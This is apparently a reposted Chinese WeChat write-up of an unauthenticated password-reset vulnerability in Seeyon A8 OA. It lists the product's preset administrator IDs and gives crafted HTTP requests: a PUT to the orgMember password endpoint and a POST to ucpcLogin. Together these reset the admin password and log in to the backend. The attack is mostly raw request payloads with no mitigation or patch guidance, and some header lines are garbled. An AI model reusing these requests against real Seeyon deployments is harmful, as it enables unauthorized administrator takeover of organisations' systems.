致远A8 存在密码重置漏洞,未授权的攻击者在知道用户名的情况下,可以构造特制的请求包,从而修改用户密码,登录系统后台。
根据致远的手册可知,管理员的预制id
/**
* 系统管理员预置ID
* @deprecated 角色角色化后,废弃不再使用
*/
public static final Long SYSTEM_ADMIN_ID = -7273032013234748168L;
/**
* 审计管理员预置ID
* @deprecated 角色角色化后,废弃不再使用,8.1后可能删除
*/
public static final Long AUDIT_ADMIN_ID = -4401606663639775639L;
/**
* 集团管理员预置ID
* @deprecated 角色角色化后,废弃不再使用,8.1后可能删除
*/
public static final Long GROUP_ADMIN_ID = 5725175934914479521L;
构造根据预制id数据包获取登录名
PUT /seeyon/rest/orgMember/-7273032013234748168/password/share.do HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 :
Accept: */*
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 :
gzip, deflate, br :
Connection: close
Cookie: JSESSIONID=3891CB3E3CA435C599001E4F03A335B0; loginPageURL=
构造数据包更改密码
POST /seeyon/rest/authentication/ucpcLogin?login_username=system&login_password=share.do&ticket=
成功登录
原文始发于微信公众号(丁永博的成长日记):致远OA ucpcLogin密码重置漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论